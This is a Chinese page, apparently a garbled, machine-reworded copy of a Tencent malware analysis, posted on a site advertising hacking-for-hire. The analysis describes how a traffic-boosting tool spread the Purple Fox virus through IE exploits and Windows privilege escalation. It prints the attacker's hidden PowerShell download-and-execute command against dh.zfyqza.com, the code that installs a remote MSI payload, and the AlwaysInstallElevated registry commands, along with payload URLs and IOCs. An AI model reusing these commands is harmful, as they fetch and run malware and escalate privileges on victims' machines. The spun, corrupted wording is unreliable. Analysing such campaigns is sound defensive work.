黑客业务

黑客服务,入侵网站,网站入侵,黑客技术,信息安全,web安全

2022年03月28日 02:03:00

黑客帝国3尼奥死了没,刷量者被反涮:“流量宝”行使破绽流传紫狐病毒,中毒电脑被安装流氓软件

       

CVE-2019-1367 | 脚本发动机内存损坏漏洞预警更新,腾讯安全发布漏洞修复工具

腾讯平安御见威胁情报中心检测到刷量软件“流量宝流量版”通过挂马攻击流传“紫狐”病毒。那些使用“流量宝流量版”刷量的电脑因熏染紫狐病毒,被强制推装多款软件。我们的监测数据解释,攻击当天有数千台电脑中毒,主要漫衍在广东、江苏、浙江等地。            

   一、靠山    

   

   近日,腾讯平安御见威胁情报中心检测到刷量软件流量宝流量版流传挂马攻击紫狐病毒。使用流量宝流量版刷量的计算机因感染紫狐病毒而被迫安装多种软件。我们的监测数据解释说,攻击当天有数千台计算机中毒,主要是在广东、江苏、浙江等地。    

   

       

   

   攻击的特点是在病毒传播和安装过程中行使大量已知系统缺陷,例如在挂马攻击页面上行使IE远程代码执行缺陷(CVE-2014-6332)和IEOffice“双杀破绽(CVE-2018-8373),挂马攻击乐成后安装紫狐病毒母体MSI安装前行使多个包Windows系统权限提升缺陷(MS15-051MS16-032CVE-2018-8120)提高过程执行权限。    

   

       

   

   幸运的是,流行迎的网民几乎不会自动使用流量宝藏流量版等工具,受害者大多是计划网络刷的从业者。因此,病毒攻击对受欢迎的网民影响不大。攻击者对各种系统缺陷的行使技能值得关注。企业网络管理可以通过腾讯皇家高级威胁检测系统实时发现行使缺陷的攻击行为。    

   

       

   

   
   

   

   流量宝流量版挂马攻击流程图    

   

       

   

   根据腾讯平安威胁情报中心的监控数据,攻击趋势出现脉冲式特征,攻击流量2019-9-10日最先,在2019-9-11日到岑岭,然后迅速回落,直到挂马页关闭。    

       
   

   
   

   

       

   

   广东、江苏、浙江是受攻击影响最严重的三个地区。    

       
   

   2.详细分析    

   

   IE破绽攻击    

       
   

   
   

   

       

   

   流量宝流量版.exe请求页面有缺陷hxxp://dh.zfyqza.com/1.htm,该页面中包罗攻击者经心组织的IE远程代码执行缺陷(CVE-2014-6332)行使攻击代码。    

       
   

   
   

   

       

   

   破绽攻击乐成后执行下令:    

   

   powershell.exe -nop -windowstyle hidden -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http[:]//dh.zfyqza.com/ps008.jpg')    

       
   

   
   

   

       

   

   流量宝流量版.exe请求的另一个攻击页面hxxp://dh.zfyqza.com/2.htm,黑客可以同时在页面中心组织OfficeIE举行攻击的Windows VBScript Engine远程代码执行缺陷(CVE-2018-8373)行使代码。    

       
   

   
   

   

       

   

   破绽攻击乐成后执行远程代码http[:]//dh.zfyqza.com/hta.hta    

       
   

   
   

   

       

   

   然后在hta.hta中继续执行Powershell代码:http[:]//dh.zfyqza.com/ps008.jpg    

       
   

   病毒植入    

   

   ps008.jpg首先建立互斥体‘Global\ifqGpTzdTzhMJSOz’确保当前历程具有唯一实例。    

       
   

   
   

   

       

   

   接着通过Security.Principal.WindowsPrincipal工具来判断当前是否属于Administrator用户权限。    

       
   

   
   

   

       

   

   如果是现在Administrator用户权限由以下代码执行MSI安装历程。    

   

   Add-Type -TypeDefinition @"    

   

   using System;    

   

   using System.Diagnostics;    

   

   using System.Runtime.InteropServices;    

   

   public static class msi    

   

   {    

   

   [DllImport("msi.dll",CharSet=CharSet.Auto)]    

   

       

   

   public static extern int MsiInstallProduct(string packagePath,string commandLine);    

   

       

   

   [DllImport("msi.dll")]    

   

   public static extern int MsiSetInternalUI(int dwUILevel,IntPtr phWnd);    

   

   }    

   

       

   

   "@    

   

   [msi]::MsiSetInternalUI(2,0);    

   

   [msi]::MsiInstallProduct("http://dh.zfyqza.com/8QSgdmFQ4bGWIkbbP.jpg","")    

   

   }    

   

       

   

   若是不是Administrator用户权限通过下列注册表项的值使用AlwaysInstallElevated计划安装有提升(系统)权限的计划Windows Installer程序包。    

   

   "cmd /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f&reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f"    

   

       

   

   在上述两个注册表下AlwaysInstallElevated值未设置为“1”,安装托管应用程序应使用提升安装程序的权限。设置完成后,安装过程相同MSI包文件http[:]//dh.zfyqza.com/8QSgdmFQ4bGWIkbbP.jpg    

   

   Windows权限提升    

   

   在Powershell还将在代码中下载3Windows权限提升缺陷模块载权限PE模块通过Invoke-ReflectiveDllInjection注入到Powershell在过程中执行,从而提高当前过程的执行权限,以便病毒MSI乐成安装在计算机上,安装文件。    

       
   

   MS15-051    

   

   模块下载地址:    

   

   hxxp://dh.zfyqza.com/1505164.jpg    

   

   hxxp://dh.zfyqza.com/1505132.jpg    

   

       

   

   破绽攻击代码:    

       
   

   MS16-032    

   

   模块下载地址:    

IE浏览器存高危漏洞 腾讯安全发布修复工具全面防范企业安全

   

   hxxp://dh.zfyqza.com/1603264.jpg    

   

   hxxp://dh.zfyqza.com/1603232.jpg    

   

       

   

   破绽攻击代码:    

       
   

   CVE-2018-8120    

   

   模块下载地址:    

   

   hxxp://dh.zfyqza.com/1808164.jpg    

   

   hxxp://dh.zfyqza.com/1808132.jpg    

   

       

   

   破绽攻击代码:    

       
   

   
   

   

       

   

   每次提权完成后,都会执行一段时间base64编码的Powershell为病毒举行代码MSI包文件安装过程。    

       
   

   紫狐病毒    

   

   在Powershell在代码中,安装最终病毒的下令是:    

   

   [msi]::MsiInstallProduct("http://dh.zfyqza.com/8QSgdmFQ4bGWIkbbP.jpg","")    

   

       

   

   8QSgdmFQ4bGWIkbbP.jpg实际上为MSI该文件是紫狐病毒的母体,具有以下特点:    

   

       

   

   1、病毒母体为MSI包,包文件中3有一个文件,有一个非PE文件(加密PE文件),另外两个是32位和64位的木马DLL    

   

   2、通过系统PendingFileRenameOperations实现机制替换系统文件启动;    

   

   3、解密出DLL文件C:\Windows\SysWOW64\Ms8E422A00App.dll并建立服务启动;    

   

   4、释放驱动模块隐藏自己的行为,在后台推广安装各种软件,病毒通过恶意推广获利。    

   

   三、安全建议    

   

   1、实时维修系统高危缺陷:    

   

   修复破绽CVE-2014-6332    

   

   微软补丁地址:http://technet.microsoft.com/security/bulletin/MS14-064    

   

       

   

   修复破绽CVE-2018-8120    

   

   微软补丁地址:    

   

   https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120    

   

       

   

   修复破绽CVE-2018-8373    

   

   微软补丁地址:    

   

   https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373    

   

       

   

   2、阻止使用来历不明的刷量软件,使用前通过杀毒软件进行病毒扫描;    

   

       

   

   3、腾讯电脑管家推荐使用腾讯电脑管家/腾讯御点阻止了此类病毒的攻击。如果有招聘,也可以用电脑管家/腾讯御点对紫狐病毒清算。    

       
   

   
   

   

       

   

   4、推荐企业用户使用腾讯御界高级威胁检测系统检测种种可疑攻击行为,包罗种种破绽行使行为的检测。御界高级威胁检测系统,是基于腾讯反病毒实验室的平安能力、依托腾讯在云和端的海量数据,研发出的怪异威胁情报和恶意检测模子系统。    

   

       

   

   IOCs    

   

   Domain    

   

   dh.zfyqza.com    

   

   
       

   

       

   

   URL    

   

   hxxp://dh.zfyqza.com/1.htm    

   

   hxxp://dh.zfyqza.com/2.htm    

   

   hxxp://dh.zfyqza.com/hta.hta    

   

   hxxp://dh.zfyqza.com/ps008.jpg    

   

   hxxp://dh.zfyqza.com/8QSgdmFQ4bGWIkbbP.jpg    

   

   hxxp://dh.zfyqza.com/pe.jpg    

   

   hxxp://dh.zfyqza.com/1808164.jpg    

   

   hxxp://dh.zfyqza.com/1603264.jpg    

   

   hxxp://dh.zfyqza.com/1505164.jpg    

   

   hxxp://dh.zfyqza.com/1808132.jpg    

   

   hxxp://dh.zfyqza.com/1603232.jpg    

   

   hxxp://dh.zfyqza.com/1505132.jpg    

   

   
       

   

       

   

   md5    

   

   e5a505f7f319bcac16cd02a42d75702e
   b8f72bf5ef16bbedf3b0d69e1b569ecf
   d64d848165533fc7704d59aef9321ec6
   de5de649e0821b0dd3dadfa8235416ea
   6467874d952a5ffc1edfd7f05b1cc86d
   ae3e7304122469f2de3ecbd920a768d1
   4facb81f57e515a508040270849bcd35
   1e11eb7eacf41bbba097e62b3d21f925
   cc46d098e2af4f0e202ab76f167dabf3    

   

   5feca9944a8ec2fe6701ff7b6ed6ca86    

   

       

   

   参考链接:    

   

   https://www.freebuf.com/column/187317.html    

   

   http://www.360.cn/n/10386.html    

   

   https://www.seebug.org/vuldb/ssvid-92734    

   

   https://blog.trendmicro.com/trendlabs-security-intelligence/use-after-free-uaf-vulnerability-cve-2018-8373-in-vbscript-engine-affects-internet-explorer-to-run-shellcode/    

微软10月发布安全更新,修复多个核心组件,腾讯御界支持检测

   

标签:黑客接单 

作者:访客 , 分类:黑客技术 , 浏览:572 , 评论:4

  • 评论列表:
  •  莣萳木落
     发布于 2022-05-29 10:02:36  回复该评论
  • 量版刷量的计算机因感染紫狐病毒而被迫安装多种软件。我们的监测数据解释说,攻击当天有数千台计算机中毒,主要是在广东、江苏、浙江等地。                        攻击的特点是在病毒传播和安装过程中行使大量已知系统缺陷,例如在挂马攻击
  •  慵吋卿忬
     发布于 2022-05-29 08:55:12  回复该评论
  •                    public static extern int MsiInstallProduct(string packagePath,string commandLine);            
  •  闹旅软酷
     发布于 2022-05-29 10:51:06  回复该评论
  • .com/ps008.jpg                    病毒植入            ps008.jpg首先建立互斥体‘Global\ifqGpTzdTzhMJSOz’确保当前历程具有唯一实例。                    
  •  断渊惑心
     发布于 2022-05-29 13:29:00  回复该评论
  • f72bf5ef16bbedf3b0d69e1b569ecf    d64d848165533fc7704d59aef9321ec6    de5de649e0821b0dd3dadfa8235416ea    6467874d952a5ffc1edfd7f05b1cc86d    ae3e7304

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.